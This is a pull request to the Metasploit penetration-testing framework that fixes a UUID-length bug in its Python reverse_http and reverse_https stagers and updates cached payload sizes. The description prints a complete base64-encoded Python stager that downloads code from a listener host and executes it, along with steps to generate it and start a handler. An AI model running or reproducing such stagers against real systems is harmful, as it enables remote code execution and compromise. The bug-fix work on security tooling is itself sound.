### PR TITLE
Fix Python reverse_http & reverse_https

### DIFF
--- a/lib/msf/core/payload/python/reverse_http.rb
+++ b/lib/msf/core/payload/python/reverse_http.rb
@@ -64,7 +64,7 @@ module Payload::Python::ReverseHttp
 
     # Generate the short default URL if we don't have enough space
     if self.available_space.nil? || required_space > self.available_space
-      uri_req_len = 5
+      uri_req_len = 30
     end
 
     generate_uri_uuid_mode(opts[:uri_uuid_mode] || :init_python, uri_req_len)

--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 
 module MetasploitModule
 
-  CachedSize = 71898
+  CachedSize = 71930
 
   include Msf::Payload::Single
   include Msf::Payload::Python

--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 
 module MetasploitModule
 
-  CachedSize = 71898
+  CachedSize = 71930
 
   include Msf::Payload::Single
   include Msf::Payload::Python

--- a/modules/payloads/stagers/python/reverse_http.rb
+++ b/modules/payloads/stagers/python/reverse_http.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/python/reverse_http'
 
 module MetasploitModule
 
-  CachedSize = 494
+  CachedSize = 526
 
   include Msf::Payload::Stager
   include Msf::Payload::Python

--- a/modules/payloads/stagers/python/reverse_https.rb
+++ b/modules/payloads/stagers/python/reverse_https.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/python/reverse_http'
 
 module MetasploitModule
 
-  CachedSize = 762
+  CachedSize = 794
 
   include Msf::Payload::Stager
   include Msf::Payload::Python


### PR DESCRIPTION
This pull request fixes a bug in Python's `reverse_http` and `reverse_https` stagers. There's an issue where if the size is not large enough<sup>[1][1]</sup> to store the UUID that the UUID will be omitted<sup>[2][2]</sup>, causing the stager to fail to transfer and load.

This increases the size from 5 to 30, to allow the UUID to be included and then updates the payload's cached size. The bug affects both the HTTP and HTTPS versions due to the code reuse.

## Verification
- [x] Start `msfconsole`
- [x] Run `use payload/python/meterpreter/reverse_http`
- [x] Set the options as appropriate
- [x] Run `to_handler` to start a handler
- [x] Run `generate -f raw` to get the stager
- [x] Execute the payload and get a functioning session

## Original (Broken) Output
```
python3 -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJ10pCmhzPVtdCm89dWwuYnVpbGRfb3BlbmVyKCpocykKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJyldCmV4ZWMoby5vcGVuKCdodHRwOi8vMTkyLjE2OC45MC4xOjgwODAvQVlIODYnKS5yZWFkKCkpCg==')))"
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "<string>", line 7, in <module>
  File "<string>", line 1
    <html><body><h1>It works!</h1></body></html>
    ^
SyntaxError: invalid syntax
```

This bug seems to have been related to commit 5621d200ccf62e4a8f0dad80c1c74f4e0e52d86b.

[1]: https://github.com/rapid7/metasploit-framework/blob/bd60d009f82405ec0c8341565a3916420ac8a09a/lib/msf/core/payload/python/reverse_http.rb#L67
[2]: https://github.com/rapid7/metasploit-framework/blob/bd60d009f82405ec0c8341565a3916420ac8a09a/lib/msf/core/payload/uuid/options.rb#L33:7